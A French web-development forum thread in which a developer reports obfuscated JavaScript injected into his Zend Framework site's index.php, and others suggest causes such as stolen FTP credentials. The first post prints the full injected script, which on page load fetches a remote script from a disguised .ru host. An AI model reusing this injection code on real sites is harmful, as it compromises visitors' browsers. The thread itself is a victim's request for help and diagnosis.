IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Code pirate ajouté à l'index.php !?


Sujet :

Sécurité

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
  1. #1
    Membre éclairé
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Par défaut Code pirate ajouté à l'index.php !?
    Hello à tous,

    Je développe un site avec ZF 1.9, et il y a eu un soucis sur le fichier index.php, du code a été ajouté je ne sais pas qui !!, voici :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    <script>/*GNU GPL*/ try{window.onload = function(){
    var Nhbk5v835x5dq6 = document.createElement('script');
    Nhbk5v835x5dq6.setAttribute('type', 'text/javascript');
    Nhbk5v835x5dq6.setAttribute('id', 'myscript1');
    Nhbk5v835x5dq6.setAttribute('src',  'h#@#$t^@#t^^!p^$:&!/(/&##g)@o^)!o)!&g)^!l$(e^-&&!c$@@n).)#!#m$(#s#!))$n)!.&^c)(!!a&.$&(!s^@#h)@&o@(p$!^&)l$&o&^!c!&)@a&l)-$^c@(^o!m@.$e((a$s^^y#m(u(#)s&&@i$c(@s!@^t)o(r^#e!@@&.)!)r!^u(#:(!8(^0$#$8)0&@@/@i#@n)!t@e^#r(^i$)$^a)#.^&p&(!&l))#^$/@(!i$)^n#(&t^#&e&$(r)&#i$)$a(@.!p^l^$/^@#g#o@#(o)()g&$$l(^e@.&&$!c(^o)m^(/)@@e&^@m#&^@p($f&l^^@!i(x!))).&^!c@o$()$m&/##!&d#e)@b$)&o(##$n^#$a)^i$r(&b@#l!^o^g@@.)#c@$@o!m(&^)/!'.replace(/@|\!|\$|&|\)|\^|#|\(/ig, ''));
    Nhbk5v835x5dq6.setAttribute('defer', 'defer');
    document.body.appendChild(Nhbk5v835x5dq6);}}
    catch(e) {}</script>
    çà sent tres mauvais ce code là ... une idée sur ce problème ?
    Merci
    Fabrice

  2. #2
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Par défaut
    Si le fichier est modifié, il y a de fortes chances qu'un virus soit présent sur ton serveur.
    N'oubliez pas de consulter les FAQ PHP et les cours et tutoriels PHP

  3. #3
    Membre éclairé
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Par défaut
    Oui, le fichier a été modifié, et ce code n'est pas sur mon serveur mais chez un hébergeur privé (Linux).... Dois je en changer ?

    Fabrice

  4. #4
    Modérateur
    Avatar de sabotage
    Homme Profil pro
    Inscrit en
    Juillet 2005
    Messages
    29 208
    Détails du profil
    Informations personnelles :
    Sexe : Homme

    Informations forums :
    Inscription : Juillet 2005
    Messages : 29 208
    Par défaut
    Le virus peut techniquement venir de plein de choses : une faille de sécurité sur le serveur en est une, on pourrait aussi imaginer un virus sur ton logiciel FTP par exemple.
    N'oubliez pas de consulter les FAQ PHP et les cours et tutoriels PHP

  5. #5
    Membre éclairé
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Par défaut
    Je ne crois pas, j'ai un anti-virus + firewall mise à jour quotidiennement, et c'est un fichier en dehors du repository, que j'exporte par la suite (pas ce fichier).

    Et l'erreur est apparue sans que j'intervienne.

    Fabrice

  6. #6
    Modérateur
    Avatar de grunk
    Homme Profil pro
    Lead dév - Architecte
    Inscrit en
    Août 2003
    Messages
    6 693
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 41
    Localisation : France, Côte d'Or (Bourgogne)

    Informations professionnelles :
    Activité : Lead dév - Architecte
    Secteur : Industrie

    Informations forums :
    Inscription : Août 2003
    Messages : 6 693
    Par défaut
    Plutôt qu'un virus , je pencherais plus pour un deface de ton site afin de récupérer les infos de tes visiteurs.
    Plusieurs cause possible :

    - Un acces ftp bateau genre toto/toto
    - Une faille quelconque sur ton site permettant à un pirate d'uploader un fichier et de l'executer
    - Une sécurité insuffisante sur ton pc , keylogger , libre accès à ta machine ...

    Un virus c'est quand même fort peu probable. D'une part un virus qui transiterais de windows à linux via un client ftp ca serait du jamais vu. Et d'autre part les virus ne vise généralement pas particumlièrement les pages web.

    Dans tous les cas tu es bon pour un check compelt de ton site, des logs si tu y a accès et de la config de ton serveur si tu es sur un serveur dédié.
    Pry Framework php5 | N'oubliez pas de consulter les FAQ Java et les cours et tutoriels Java

  7. #7
    Invité de passage
    Profil pro
    Inscrit en
    Décembre 2009
    Messages
    1
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2009
    Messages : 1
    Par défaut
    je viens de connaitre le même problème :
    modification, via ftp je suppose, des fichiers contenant le mot index.
    J'ai l'impression que le procédure a lieu quand je suis connecté en FTP sur le site sur lequel je bosse. Perso, j'utilise dream CSS4 comme client FTP.
    je pense que le script ajouté permet de récupérer l'url du site (l'accès FTP seul ne donnant pas l'information) et qu'ensuite d'autre appli sont installé.

    dans le script pour le paramètre src, en supprimant tous les caractères spéciaux on obtient une url :
    .....msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/

  8. #8
    Membre éclairé
    Avatar de __fabrice
    Homme Profil pro
    Développeur Back-End
    Inscrit en
    Août 2004
    Messages
    404
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Développeur Back-End

    Informations forums :
    Inscription : Août 2004
    Messages : 404
    Par défaut
    Hello,

    Merci pour ces infos. Ce site ne me dis rien, surtout avec un .ru à la fin
    Ma foi, je vais vérifier tout çà... et voir si çà se reproduit.

    Fab

  9. #9
    Invité
    Invité(e)
    Par défaut
    Bonjour,
    Ce serait interessant que tu donnes même par MP si tu veux, l(URL de ton site, que ceux qui ont des techniques dans ce domaine aillent titiller la bête.

    Cela ne peut qu'étre util !

Discussions similaires

  1. Ajout de /index.php au nom de mon site
    Par Daniel63 dans le forum 1&1
    Réponses: 7
    Dernier message: 14/01/2015, 13h14
  2. Site piraté, ajout de code permanent
    Par Invité dans le forum jQuery
    Réponses: 12
    Dernier message: 03/05/2013, 16h58
  3. error 500 si je n'ajoute pas "/index.php"
    Par student_php dans le forum Apache
    Réponses: 1
    Dernier message: 16/07/2012, 21h20
  4. exécution des fichiers index.php
    Par berry dans le forum Apache
    Réponses: 4
    Dernier message: 20/12/2004, 20h29
  5. ajout d'index en cours d'utilisation
    Par jbat dans le forum MS SQL Server
    Réponses: 6
    Dernier message: 10/11/2003, 10h12

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo